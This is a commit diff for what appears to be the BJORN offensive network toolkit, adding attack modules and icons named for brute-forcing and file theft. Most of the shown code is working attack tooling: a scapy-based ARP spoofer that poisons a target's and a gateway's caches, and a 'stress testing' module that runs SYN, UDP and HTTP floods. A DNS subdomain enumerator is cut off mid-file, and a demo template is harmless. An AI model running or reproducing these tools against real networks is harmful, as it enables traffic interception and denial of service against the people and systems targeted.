BREAKING CHANGE: Complete refactor of architecture to prepare BJORN V2 release, APIs, assets, and UI, webapp, logics, attacks, a lot of new features...
BIN
resources/default_config/actions/actions_icons/ARPSpoof.png
Normal file
|
After Width: | Height: | Size: 40 KiB |
|
After Width: | Height: | Size: 29 KiB |
BIN
resources/default_config/actions/actions_icons/DNSPillager.png
Normal file
|
After Width: | Height: | Size: 114 KiB |
BIN
resources/default_config/actions/actions_icons/FTPBruteforce.png
Normal file
|
After Width: | Height: | Size: 162 KiB |
BIN
resources/default_config/actions/actions_icons/FreyaHarvest.png
Normal file
|
After Width: | Height: | Size: 34 KiB |
BIN
resources/default_config/actions/actions_icons/HeimdallGuard.png
Normal file
|
After Width: | Height: | Size: 33 KiB |
BIN
resources/default_config/actions/actions_icons/IDLE.png
Normal file
|
After Width: | Height: | Size: 175 KiB |
BIN
resources/default_config/actions/actions_icons/LokiDeceiver.png
Normal file
|
After Width: | Height: | Size: 25 KiB |
|
After Width: | Height: | Size: 178 KiB |
|
After Width: | Height: | Size: 185 KiB |
BIN
resources/default_config/actions/actions_icons/OdinEye.png
Normal file
|
After Width: | Height: | Size: 138 KiB |
BIN
resources/default_config/actions/actions_icons/PresenceJoin.png
Normal file
|
After Width: | Height: | Size: 70 KiB |
BIN
resources/default_config/actions/actions_icons/PresenceLeave.png
Normal file
|
After Width: | Height: | Size: 76 KiB |
BIN
resources/default_config/actions/actions_icons/RuneCracker.png
Normal file
|
After Width: | Height: | Size: 2.2 MiB |
BIN
resources/default_config/actions/actions_icons/SMBBruteforce.png
Normal file
|
After Width: | Height: | Size: 172 KiB |
BIN
resources/default_config/actions/actions_icons/SQLBruteforce.png
Normal file
|
After Width: | Height: | Size: 181 KiB |
BIN
resources/default_config/actions/actions_icons/SSHBruteforce.png
Normal file
|
After Width: | Height: | Size: 221 KiB |
BIN
resources/default_config/actions/actions_icons/StealDataSQL.png
Normal file
|
After Width: | Height: | Size: 181 KiB |
BIN
resources/default_config/actions/actions_icons/StealFilesFTP.png
Normal file
|
After Width: | Height: | Size: 154 KiB |
BIN
resources/default_config/actions/actions_icons/StealFilesSMB.png
Normal file
|
After Width: | Height: | Size: 172 KiB |
BIN
resources/default_config/actions/actions_icons/StealFilesSSH.png
Normal file
|
After Width: | Height: | Size: 159 KiB |
|
After Width: | Height: | Size: 155 KiB |
|
After Width: | Height: | Size: 172 KiB |
BIN
resources/default_config/actions/actions_icons/ThorHammer.png
Normal file
|
After Width: | Height: | Size: 137 KiB |
BIN
resources/default_config/actions/actions_icons/ValkyrieScout.png
Normal file
|
After Width: | Height: | Size: 30 KiB |
|
After Width: | Height: | Size: 30 KiB |
|
After Width: | Height: | Size: 27 KiB |
BIN
resources/default_config/actions/actions_icons/default.png
Normal file
|
After Width: | Height: | Size: 24 KiB |
BIN
resources/default_config/actions/actions_icons/thor_hammer.png
Normal file
|
After Width: | Height: | Size: 19 KiB |
163
resources/default_config/actions/arp_spoofer.py
Normal file
@@ -0,0 +1,163 @@
|
||||
# AARP Spoofer by poisoning the ARP cache of a target and a gateway.
|
||||
# Saves settings (target, gateway, interface, delay) in `/home/bjorn/.settings_bjorn/arpspoofer_settings.json`.
|
||||
# Automatically loads saved settings if arguments are not provided.
|
||||
# -t, --target IP address of the target device (overrides saved value).
|
||||
# -g, --gateway IP address of the gateway (overrides saved value).
|
||||
# -i, --interface Network interface (default: primary or saved).
|
||||
# -d, --delay Delay between ARP packets in seconds (default: 2 or saved).
|
||||
# - First time: python arpspoofer.py -t TARGET -g GATEWAY -i INTERFACE -d DELAY
|
||||
# - Subsequent: python arpspoofer.py (uses saved settings).
|
||||
# - Update: Provide any argument to override saved values.
|
||||
|
||||
import os
|
||||
import json
|
||||
import time
|
||||
import argparse
|
||||
from scapy.all import ARP, send, sr1, conf
|
||||
|
||||
|
||||
b_class = "ARPSpoof"
|
||||
b_module = "arp_spoofer"
|
||||
b_enabled = 0
|
||||
# Répertoire et fichier de paramètres
|
||||
SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
SETTINGS_FILE = os.path.join(SETTINGS_DIR, "arpspoofer_settings.json")
|
||||
|
||||
class ARPSpoof:
|
||||
def __init__(self, target_ip, gateway_ip, interface, delay):
|
||||
self.target_ip = target_ip
|
||||
self.gateway_ip = gateway_ip
|
||||
self.interface = interface
|
||||
self.delay = delay
|
||||
conf.iface = self.interface # Set the interface
|
||||
print(f"ARPSpoof initialized with target IP: {self.target_ip}, gateway IP: {self.gateway_ip}, interface: {self.interface}, delay: {self.delay}s")
|
||||
|
||||
def get_mac(self, ip):
|
||||
"""Gets the MAC address of a target IP by sending an ARP request."""
|
||||
print(f"Retrieving MAC address for IP: {ip}")
|
||||
try:
|
||||
arp_request = ARP(pdst=ip)
|
||||
response = sr1(arp_request, timeout=2, verbose=False)
|
||||
if response:
|
||||
print(f"MAC address found for {ip}: {response.hwsrc}")
|
||||
return response.hwsrc
|
||||
else:
|
||||
print(f"No ARP response received for IP {ip}")
|
||||
return None
|
||||
except Exception as e:
|
||||
print(f"Error retrieving MAC address for {ip}: {e}")
|
||||
return None
|
||||
|
||||
def spoof(self, target_ip, spoof_ip):
|
||||
"""Sends an ARP packet to spoof the target into believing the attacker's IP is the spoofed IP."""
|
||||
print(f"Preparing ARP spoofing for target {target_ip}, pretending to be {spoof_ip}")
|
||||
target_mac = self.get_mac(target_ip)
|
||||
spoof_mac = self.get_mac(spoof_ip)
|
||||
if not target_mac or not spoof_mac:
|
||||
print(f"Cannot find MAC address for target {target_ip} or {spoof_ip}, spoofing aborted")
|
||||
return
|
||||
|
||||
try:
|
||||
arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=spoof_mac)
|
||||
send(arp_response, verbose=False)
|
||||
print(f"Spoofed ARP packet sent to {target_ip} claiming to be {spoof_ip}")
|
||||
except Exception as e:
|
||||
print(f"Error sending ARP packet to {target_ip}: {e}")
|
||||
|
||||
def restore(self, target_ip, spoof_ip):
|
||||
"""Sends an ARP packet to restore the legitimate IP/MAC mapping for the target and spoof IP."""
|
||||
print(f"Restoring ARP association for {target_ip} using {spoof_ip}")
|
||||
target_mac = self.get_mac(target_ip)
|
||||
gateway_mac = self.get_mac(spoof_ip)
|
||||
|
||||
if not target_mac or not gateway_mac:
|
||||
print(f"Cannot restore ARP, MAC addresses not found for {target_ip} or {spoof_ip}")
|
||||
return
|
||||
|
||||
try:
|
||||
arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=gateway_mac)
|
||||
send(arp_response, verbose=False, count=5)
|
||||
print(f"ARP association restored between {spoof_ip} and {target_mac}")
|
||||
except Exception as e:
|
||||
print(f"Error restoring ARP association for {target_ip}: {e}")
|
||||
|
||||
def execute(self):
|
||||
"""Executes the ARP spoofing attack."""
|
||||
try:
|
||||
print(f"Starting ARP Spoofing attack on target {self.target_ip} via gateway {self.gateway_ip}")
|
||||
|
||||
while True:
|
||||
target_mac = self.get_mac(self.target_ip)
|
||||
gateway_mac = self.get_mac(self.gateway_ip)
|
||||
|
||||
if not target_mac or not gateway_mac:
|
||||
print(f"Error retrieving MAC addresses, stopping ARP Spoofing")
|
||||
self.restore(self.target_ip, self.gateway_ip)
|
||||
self.restore(self.gateway_ip, self.target_ip)
|
||||
break
|
||||
|
||||
print(f"Sending ARP packets to poison {self.target_ip} and {self.gateway_ip}")
|
||||
self.spoof(self.target_ip, self.gateway_ip)
|
||||
self.spoof(self.gateway_ip, self.target_ip)
|
||||
|
||||
time.sleep(self.delay)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
print("Attack interrupted. Restoring ARP tables.")
|
||||
self.restore(self.target_ip, self.gateway_ip)
|
||||
self.restore(self.gateway_ip, self.target_ip)
|
||||
print("ARP Spoofing stopped and ARP tables restored.")
|
||||
except Exception as e:
|
||||
print(f"Unexpected error during ARP Spoofing attack: {e}")
|
||||
|
||||
def save_settings(target, gateway, interface, delay):
|
||||
"""Saves the ARP spoofing settings to a JSON file."""
|
||||
try:
|
||||
os.makedirs(SETTINGS_DIR, exist_ok=True)
|
||||
settings = {
|
||||
"target": target,
|
||||
"gateway": gateway,
|
||||
"interface": interface,
|
||||
"delay": delay
|
||||
}
|
||||
with open(SETTINGS_FILE, 'w') as file:
|
||||
json.dump(settings, file)
|
||||
print(f"Settings saved to {SETTINGS_FILE}")
|
||||
except Exception as e:
|
||||
print(f"Failed to save settings: {e}")
|
||||
|
||||
def load_settings():
|
||||
"""Loads the ARP spoofing settings from a JSON file."""
|
||||
if os.path.exists(SETTINGS_FILE):
|
||||
try:
|
||||
with open(SETTINGS_FILE, 'r') as file:
|
||||
return json.load(file)
|
||||
except Exception as e:
|
||||
print(f"Failed to load settings: {e}")
|
||||
return {}
|
||||
|
||||
if __name__ == "__main__":
|
||||
parser = argparse.ArgumentParser(description="ARP Spoofing Attack Script")
|
||||
parser.add_argument("-t", "--target", help="IP address of the target device")
|
||||
parser.add_argument("-g", "--gateway", help="IP address of the gateway")
|
||||
parser.add_argument("-i", "--interface", default=conf.iface, help="Network interface to use (default: primary interface)")
|
||||
parser.add_argument("-d", "--delay", type=float, default=2, help="Delay between ARP packets in seconds (default: 2 seconds)")
|
||||
args = parser.parse_args()
|
||||
|
||||
# Load saved settings and override with CLI arguments
|
||||
settings = load_settings()
|
||||
target_ip = args.target or settings.get("target")
|
||||
gateway_ip = args.gateway or settings.get("gateway")
|
||||
interface = args.interface or settings.get("interface")
|
||||
delay = args.delay or settings.get("delay")
|
||||
|
||||
if not target_ip or not gateway_ip:
|
||||
print("Target and Gateway IPs are required. Use -t and -g or save them in the settings file.")
|
||||
exit(1)
|
||||
|
||||
# Save the settings for future use
|
||||
save_settings(target_ip, gateway_ip, interface, delay)
|
||||
|
||||
# Execute the attack
|
||||
spoof = ARPSpoof(target_ip=target_ip, gateway_ip=gateway_ip, interface=interface, delay=delay)
|
||||
spoof.execute()
|
||||
315
resources/default_config/actions/berserker_force.py
Normal file
@@ -0,0 +1,315 @@
|
||||
# Resource exhaustion testing tool for network and service stress analysis.
|
||||
# Saves settings in `/home/bjorn/.settings_bjorn/berserker_force_settings.json`.
|
||||
# Automatically loads saved settings if arguments are not provided.
|
||||
# -t, --target Target IP or hostname to test.
|
||||
# -p, --ports Ports to test (comma-separated, default: common ports).
|
||||
# -m, --mode Test mode (syn, udp, http, mixed, default: mixed).
|
||||
# -r, --rate Packets per second (default: 100).
|
||||
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/stress).
|
||||
|
||||
import os
|
||||
import json
|
||||
import argparse
|
||||
from datetime import datetime
|
||||
import logging
|
||||
import threading
|
||||
import time
|
||||
import queue
|
||||
import socket
|
||||
import random
|
||||
import requests
|
||||
from scapy.all import *
|
||||
import psutil
|
||||
from collections import defaultdict
|
||||
|
||||
b_class = "BerserkerForce"
|
||||
b_module = "berserker_force"
|
||||
b_enabled = 0
|
||||
|
||||
# Configure logging
|
||||
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
|
||||
|
||||
# Default settings
|
||||
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/stress"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "berserker_force_settings.json")
|
||||
DEFAULT_PORTS = [21, 22, 23, 25, 80, 443, 445, 3306, 3389, 5432]
|
||||
|
||||
class BerserkerForce:
|
||||
def __init__(self, target, ports=None, mode='mixed', rate=100, output_dir=DEFAULT_OUTPUT_DIR):
|
||||
self.target = target
|
||||
self.ports = ports or DEFAULT_PORTS
|
||||
self.mode = mode
|
||||
self.rate = rate
|
||||
self.output_dir = output_dir
|
||||
|
||||
self.active = False
|
||||
self.lock = threading.Lock()
|
||||
self.packet_queue = queue.Queue()
|
||||
|
||||
self.stats = defaultdict(int)
|
||||
self.start_time = None
|
||||
self.target_resources = {}
|
||||
|
||||
def monitor_target(self):
|
||||
"""Monitor target's response times and availability."""
|
||||
while self.active:
|
||||
try:
|
||||
for port in self.ports:
|
||||
try:
|
||||
start_time = time.time()
|
||||
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
|
||||
s.settimeout(1)
|
||||
result = s.connect_ex((self.target, port))
|
||||
response_time = time.time() - start_time
|
||||
|
||||
with self.lock:
|
||||
self.target_resources[port] = {
|
||||
'status': 'open' if result == 0 else 'closed',
|
||||
'response_time': response_time
|
||||
}
|
||||
except:
|
||||
with self.lock:
|
||||
self.target_resources[port] = {
|
||||
'status': 'error',
|
||||
'response_time': None
|
||||
}
|
||||
|
||||
time.sleep(1)
|
||||
except Exception as e:
|
||||
logging.error(f"Error monitoring target: {e}")
|
||||
|
||||
def syn_flood(self):
|
||||
"""Generate SYN flood packets."""
|
||||
while self.active:
|
||||
try:
|
||||
for port in self.ports:
|
||||
packet = IP(dst=self.target)/TCP(dport=port, flags="S",
|
||||
seq=random.randint(0, 65535))
|
||||
self.packet_queue.put(('syn', packet))
|
||||
with self.lock:
|
||||
self.stats['syn_packets'] += 1
|
||||
|
||||
time.sleep(1/self.rate)
|
||||
except Exception as e:
|
||||
logging.error(f"Error in SYN flood: {e}")
|
||||
|
||||
def udp_flood(self):
|
||||
"""Generate UDP flood packets."""
|
||||
while self.active:
|
||||
try:
|
||||
for port in self.ports:
|
||||
data = os.urandom(1024) # Random payload
|
||||
packet = IP(dst=self.target)/UDP(dport=port)/Raw(load=data)
|
||||
self.packet_queue.put(('udp', packet))
|
||||
with self.lock:
|
||||
self.stats['udp_packets'] += 1
|
||||
|
||||
time.sleep(1/self.rate)
|
||||
except Exception as e:
|
||||
logging.error(f"Error in UDP flood: {e}")
|
||||
|
||||
def http_flood(self):
|
||||
"""Generate HTTP flood requests."""
|
||||
while self.active:
|
||||
try:
|
||||
for port in [80, 443]:
|
||||
if port in self.ports:
|
||||
protocol = 'https' if port == 443 else 'http'
|
||||
url = f"{protocol}://{self.target}"
|
||||
|
||||
# Randomize request type
|
||||
request_type = random.choice(['get', 'post', 'head'])
|
||||
|
||||
try:
|
||||
if request_type == 'get':
|
||||
requests.get(url, timeout=1)
|
||||
elif request_type == 'post':
|
||||
requests.post(url, data=os.urandom(1024), timeout=1)
|
||||
else:
|
||||
requests.head(url, timeout=1)
|
||||
|
||||
with self.lock:
|
||||
self.stats['http_requests'] += 1
|
||||
|
||||
except:
|
||||
with self.lock:
|
||||
self.stats['http_errors'] += 1
|
||||
|
||||
time.sleep(1/self.rate)
|
||||
except Exception as e:
|
||||
logging.error(f"Error in HTTP flood: {e}")
|
||||
|
||||
def packet_sender(self):
|
||||
"""Send packets from the queue."""
|
||||
while self.active:
|
||||
try:
|
||||
if not self.packet_queue.empty():
|
||||
packet_type, packet = self.packet_queue.get()
|
||||
send(packet, verbose=False)
|
||||
|
||||
with self.lock:
|
||||
self.stats['packets_sent'] += 1
|
||||
|
||||
else:
|
||||
time.sleep(0.1)
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error sending packet: {e}")
|
||||
|
||||
def calculate_statistics(self):
|
||||
"""Calculate and update testing statistics."""
|
||||
duration = time.time() - self.start_time
|
||||
|
||||
stats = {
|
||||
'duration': duration,
|
||||
'packets_per_second': self.stats['packets_sent'] / duration,
|
||||
'total_packets': self.stats['packets_sent'],
|
||||
'syn_packets': self.stats['syn_packets'],
|
||||
'udp_packets': self.stats['udp_packets'],
|
||||
'http_requests': self.stats['http_requests'],
|
||||
'http_errors': self.stats['http_errors'],
|
||||
'target_resources': self.target_resources
|
||||
}
|
||||
|
||||
return stats
|
||||
|
||||
def save_results(self):
|
||||
"""Save test results and statistics."""
|
||||
try:
|
||||
os.makedirs(self.output_dir, exist_ok=True)
|
||||
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
|
||||
|
||||
results = {
|
||||
'timestamp': datetime.now().isoformat(),
|
||||
'configuration': {
|
||||
'target': self.target,
|
||||
'ports': self.ports,
|
||||
'mode': self.mode,
|
||||
'rate': self.rate
|
||||
},
|
||||
'statistics': self.calculate_statistics()
|
||||
}
|
||||
|
||||
output_file = os.path.join(self.output_dir, f"stress_test_{timestamp}.json")
|
||||
with open(output_file, 'w') as f:
|
||||
json.dump(results, f, indent=4)
|
||||
|
||||
logging.info(f"Results saved to {output_file}")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save results: {e}")
|
||||
|
||||
def start(self):
|
||||
"""Start stress testing."""
|
||||
self.active = True
|
||||
self.start_time = time.time()
|
||||
|
||||
threads = []
|
||||
|
||||
# Start monitoring thread
|
||||
monitor_thread = threading.Thread(target=self.monitor_target)
|
||||
monitor_thread.start()
|
||||
threads.append(monitor_thread)
|
||||
|
||||
# Start sender thread
|
||||
sender_thread = threading.Thread(target=self.packet_sender)
|
||||
sender_thread.start()
|
||||
threads.append(sender_thread)
|
||||
|
||||
# Start attack threads based on mode
|
||||
if self.mode in ['syn', 'mixed']:
|
||||
syn_thread = threading.Thread(target=self.syn_flood)
|
||||
syn_thread.start()
|
||||
threads.append(syn_thread)
|
||||
|
||||
if self.mode in ['udp', 'mixed']:
|
||||
udp_thread = threading.Thread(target=self.udp_flood)
|
||||
udp_thread.start()
|
||||
threads.append(udp_thread)
|
||||
|
||||
if self.mode in ['http', 'mixed']:
|
||||
http_thread = threading.Thread(target=self.http_flood)
|
||||
http_thread.start()
|
||||
threads.append(http_thread)
|
||||
|
||||
return threads
|
||||
|
||||
def stop(self):
|
||||
"""Stop stress testing."""
|
||||
self.active = False
|
||||
self.save_results()
|
||||
|
||||
def save_settings(target, ports, mode, rate, output_dir):
|
||||
"""Save settings to JSON file."""
|
||||
try:
|
||||
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
|
||||
settings = {
|
||||
"target": target,
|
||||
"ports": ports,
|
||||
"mode": mode,
|
||||
"rate": rate,
|
||||
"output_dir": output_dir
|
||||
}
|
||||
with open(SETTINGS_FILE, 'w') as f:
|
||||
json.dump(settings, f)
|
||||
logging.info(f"Settings saved to {SETTINGS_FILE}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save settings: {e}")
|
||||
|
||||
def load_settings():
|
||||
"""Load settings from JSON file."""
|
||||
if os.path.exists(SETTINGS_FILE):
|
||||
try:
|
||||
with open(SETTINGS_FILE, 'r') as f:
|
||||
return json.load(f)
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to load settings: {e}")
|
||||
return {}
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Resource exhaustion testing tool")
|
||||
parser.add_argument("-t", "--target", help="Target IP or hostname")
|
||||
parser.add_argument("-p", "--ports", help="Ports to test (comma-separated)")
|
||||
parser.add_argument("-m", "--mode", choices=['syn', 'udp', 'http', 'mixed'],
|
||||
default='mixed', help="Test mode")
|
||||
parser.add_argument("-r", "--rate", type=int, default=100, help="Packets per second")
|
||||
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
|
||||
args = parser.parse_args()
|
||||
|
||||
settings = load_settings()
|
||||
target = args.target or settings.get("target")
|
||||
ports = [int(p) for p in args.ports.split(',')] if args.ports else settings.get("ports", DEFAULT_PORTS)
|
||||
mode = args.mode or settings.get("mode")
|
||||
rate = args.rate or settings.get("rate")
|
||||
output_dir = args.output or settings.get("output_dir")
|
||||
|
||||
if not target:
|
||||
logging.error("Target is required. Use -t or save it in settings")
|
||||
return
|
||||
|
||||
save_settings(target, ports, mode, rate, output_dir)
|
||||
|
||||
berserker = BerserkerForce(
|
||||
target=target,
|
||||
ports=ports,
|
||||
mode=mode,
|
||||
rate=rate,
|
||||
output_dir=output_dir
|
||||
)
|
||||
|
||||
try:
|
||||
threads = berserker.start()
|
||||
logging.info(f"Stress testing started against {target}")
|
||||
|
||||
while True:
|
||||
time.sleep(1)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
logging.info("Stopping stress test...")
|
||||
berserker.stop()
|
||||
for thread in threads:
|
||||
thread.join()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
234
resources/default_config/actions/demo_action.py
Normal file
@@ -0,0 +1,234 @@
|
||||
# demo_action.py
|
||||
# Demonstration Action: wrapped in a DemoAction class
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Metadata (compatible with sync_actions / Neo launcher)
|
||||
# ---------------------------------------------------------------------------
|
||||
b_class = "DemoAction"
|
||||
b_module = "demo_action"
|
||||
b_enabled = 1
|
||||
b_action = "normal" # normal | aggressive | stealth
|
||||
b_category = "demo"
|
||||
b_name = "Demo Action"
|
||||
b_description = "Demonstration action: simply prints the received arguments."
|
||||
b_author = "Template"
|
||||
b_version = "0.1.0"
|
||||
b_icon = "demo_action.png"
|
||||
|
||||
b_examples = [
|
||||
{
|
||||
"profile": "quick",
|
||||
"interface": "auto",
|
||||
"target": "192.168.1.10",
|
||||
"port": 80,
|
||||
"protocol": "tcp",
|
||||
"verbose": True,
|
||||
"timeout": 30,
|
||||
"concurrency": 2,
|
||||
"notes": "Quick HTTP scan"
|
||||
},
|
||||
{
|
||||
"profile": "deep",
|
||||
"interface": "eth0",
|
||||
"target": "example.org",
|
||||
"port": 443,
|
||||
"protocol": "tcp",
|
||||
"verbose": False,
|
||||
"timeout": 120,
|
||||
"concurrency": 8,
|
||||
"notes": "Deep TLS profile"
|
||||
}
|
||||
]
|
||||
|
||||
b_docs_url = "docs/actions/DemoAction.md"
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# UI argument schema
|
||||
# ---------------------------------------------------------------------------
|
||||
b_args = {
|
||||
"profile": {
|
||||
"type": "select",
|
||||
"label": "Profile",
|
||||
"choices": ["quick", "balanced", "deep"],
|
||||
"default": "balanced",
|
||||
"help": "Choose a profile: speed vs depth."
|
||||
},
|
||||
"interface": {
|
||||
"type": "select",
|
||||
"label": "Network Interface",
|
||||
"choices": [],
|
||||
"default": "auto",
|
||||
"help": "'auto' tries to detect the default network interface."
|
||||
},
|
||||
"target": {
|
||||
"type": "text",
|
||||
"label": "Target (IP/Host)",
|
||||
"default": "192.168.1.1",
|
||||
"placeholder": "e.g. 192.168.1.10 or example.org",
|
||||
"help": "Main target."
|
||||
},
|
||||
"port": {
|
||||
"type": "number",
|
||||
"label": "Port",
|
||||
"min": 1,
|
||||
"max": 65535,
|
||||
"step": 1,
|
||||
"default": 80
|
||||
},
|
||||
"protocol": {
|
||||
"type": "select",
|
||||
"label": "Protocol",
|
||||
"choices": ["tcp", "udp"],
|
||||
"default": "tcp"
|
||||
},
|
||||
"verbose": {
|
||||
"type": "checkbox",
|
||||
"label": "Verbose output",
|
||||
"default": False
|
||||
},
|
||||
"timeout": {
|
||||
"type": "slider",
|
||||
"label": "Timeout (seconds)",
|
||||
"min": 5,
|
||||
"max": 600,
|
||||
"step": 5,
|
||||
"default": 60
|
||||
},
|
||||
"concurrency": {
|
||||
"type": "range",
|
||||
"label": "Concurrency",
|
||||
"min": 1,
|
||||
"max": 32,
|
||||
"step": 1,
|
||||
"default": 4,
|
||||
"help": "Number of parallel tasks (demo only)."
|
||||
},
|
||||
"notes": {
|
||||
"type": "text",
|
||||
"label": "Notes",
|
||||
"default": "",
|
||||
"placeholder": "Free-form comments",
|
||||
"help": "Free text field to demonstrate a simple string input."
|
||||
}
|
||||
}
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Dynamic detection of interfaces
|
||||
# ---------------------------------------------------------------------------
|
||||
import os
|
||||
try:
|
||||
import psutil
|
||||
except Exception:
|
||||
psutil = None
|
||||
|
||||
|
||||
def _list_net_ifaces() -> list[str]:
|
||||
names = set()
|
||||
if psutil:
|
||||
try:
|
||||
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
|
||||
except Exception:
|
||||
pass
|
||||
try:
|
||||
for n in os.listdir("/sys/class/net"):
|
||||
if n and n != "lo":
|
||||
names.add(n)
|
||||
except Exception:
|
||||
pass
|
||||
out = ["auto"] + sorted(names)
|
||||
seen, unique = set(), []
|
||||
for x in out:
|
||||
if x not in seen:
|
||||
unique.append(x)
|
||||
seen.add(x)
|
||||
return unique
|
||||
|
||||
|
||||
def compute_dynamic_b_args(base: dict) -> dict:
|
||||
d = dict(base or {})
|
||||
if "interface" in d:
|
||||
d["interface"]["choices"] = _list_net_ifaces() or ["auto", "eth0", "wlan0"]
|
||||
if d["interface"].get("default") not in d["interface"]["choices"]:
|
||||
d["interface"]["default"] = "auto"
|
||||
return d
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# DemoAction class
|
||||
# ---------------------------------------------------------------------------
|
||||
import argparse
|
||||
|
||||
|
||||
class DemoAction:
|
||||
"""Wrapper called by the orchestrator."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
self.meta = {
|
||||
"class": b_class,
|
||||
"module": b_module,
|
||||
"enabled": b_enabled,
|
||||
"action": b_action,
|
||||
"category": b_category,
|
||||
"name": b_name,
|
||||
"description": b_description,
|
||||
"author": b_author,
|
||||
"version": b_version,
|
||||
"icon": b_icon,
|
||||
"examples": b_examples,
|
||||
"docs_url": b_docs_url,
|
||||
"args_schema": b_args,
|
||||
}
|
||||
|
||||
def execute(self, ip=None, port=None, row=None, status_key=None):
|
||||
"""Called by the orchestrator. This demo only prints arguments."""
|
||||
self.shared_data.bjorn_orch_status = "DemoAction"
|
||||
self.shared_data.comment_params = {"ip": ip, "port": port}
|
||||
|
||||
print("=== DemoAction :: executed ===")
|
||||
print(f" IP/Target: {ip}:{port}")
|
||||
print(f" Row: {row}")
|
||||
print(f" Status key: {status_key}")
|
||||
print("No real action performed: demonstration only.")
|
||||
return "success"
|
||||
|
||||
def run(self, argv=None):
|
||||
"""Standalone CLI mode for testing."""
|
||||
parser = argparse.ArgumentParser(description=b_description)
|
||||
parser.add_argument("--profile", choices=b_args["profile"]["choices"],
|
||||
default=b_args["profile"]["default"])
|
||||
parser.add_argument("--interface", default=b_args["interface"]["default"])
|
||||
parser.add_argument("--target", default=b_args["target"]["default"])
|
||||
parser.add_argument("--port", type=int, default=b_args["port"]["default"])
|
||||
parser.add_argument("--protocol", choices=b_args["protocol"]["choices"],
|
||||
default=b_args["protocol"]["default"])
|
||||
parser.add_argument("--verbose", action="store_true",
|
||||
default=bool(b_args["verbose"]["default"]))
|
||||
parser.add_argument("--timeout", type=int, default=b_args["timeout"]["default"])
|
||||
parser.add_argument("--concurrency", type=int, default=b_args["concurrency"]["default"])
|
||||
parser.add_argument("--notes", default=b_args["notes"]["default"])
|
||||
|
||||
args = parser.parse_args(argv)
|
||||
|
||||
print("=== DemoAction :: received parameters ===")
|
||||
for k, v in vars(args).items():
|
||||
print(f" {k:11}: {v}")
|
||||
|
||||
print("\n=== Demo usage of parameters ===")
|
||||
if args.verbose:
|
||||
print("[verbose] Verbose mode enabled → simulated detailed logs...")
|
||||
|
||||
if args.profile == "quick":
|
||||
print("Profile: quick → would perform fast operations.")
|
||||
elif args.profile == "deep":
|
||||
print("Profile: deep → would perform longer, more thorough operations.")
|
||||
else:
|
||||
print("Profile: balanced → compromise between speed and depth.")
|
||||
|
||||
print(f"Target: {args.target}:{args.port}/{args.protocol} via {args.interface}")
|
||||
print(f"Timeout: {args.timeout} sec, Concurrency: {args.concurrency}")
|
||||
print("No real action performed: demonstration only.")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
DemoAction(shared_data=None).run()
|
||||
175
resources/default_config/actions/dns_pillager.py
Normal file
@@ -0,0 +1,175 @@
|
||||
# DNS Pillager for reconnaissance and enumeration of DNS infrastructure.
|
||||
# Saves settings in `/home/bjorn/.settings_bjorn/dns_pillager_settings.json`.
|
||||
# Automatically loads saved settings if arguments are not provided.
|
||||
# -d, --domain Target domain for enumeration (overrides saved value).
|
||||
# -w, --wordlist Path to subdomain wordlist (default: built-in list).
|
||||
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/dns).
|
||||
# -t, --threads Number of threads for scanning (default: 10).
|
||||
# -r, --recursive Enable recursive enumeration of discovered subdomains.
|
||||
|
||||
import os
|
||||
import json
|
||||
import dns.resolver
|
||||
import threading
|
||||
import argparse
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
from datetime import datetime
|
||||
import logging
|
||||
|
||||
|
||||
# Configure logging
|
||||
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
|
||||
|
||||
|
||||
b_class = "DNSPillager"
|
||||
b_module = "dns_pillager"
|
||||
b_enabled = 0
|
||||
|
||||
# Default settings
|
||||
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/dns"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "dns_pillager_settings.json")
|
||||
DEFAULT_RECORD_TYPES = ['A', 'AAAA', 'MX', 'NS', 'TXT', 'CNAME', 'SOA']
|
||||
|
||||
class DNSPillager:
|
||||
def __init__(self, domain, wordlist=None, output_dir=DEFAULT_OUTPUT_DIR, threads=10, recursive=False):
|
||||
self.domain = domain
|
||||
self.wordlist = wordlist
|
||||
self.output_dir = output_dir
|
||||
self.threads = threads
|
||||
self.recursive = recursive
|
||||
self.discovered_domains = set()
|
||||
self.lock = threading.Lock()
|
||||
self.resolver = dns.resolver.Resolver()
|
||||
self.resolver.timeout = 1
|
||||
self.resolver.lifetime = 1
|
||||
|
||||
def save_results(self, results):
|
||||
"""Save enumeration results to a JSON file."""
|
||||
try:
|
||||
os.makedirs(self.output_dir, exist_ok=True)
|
||||
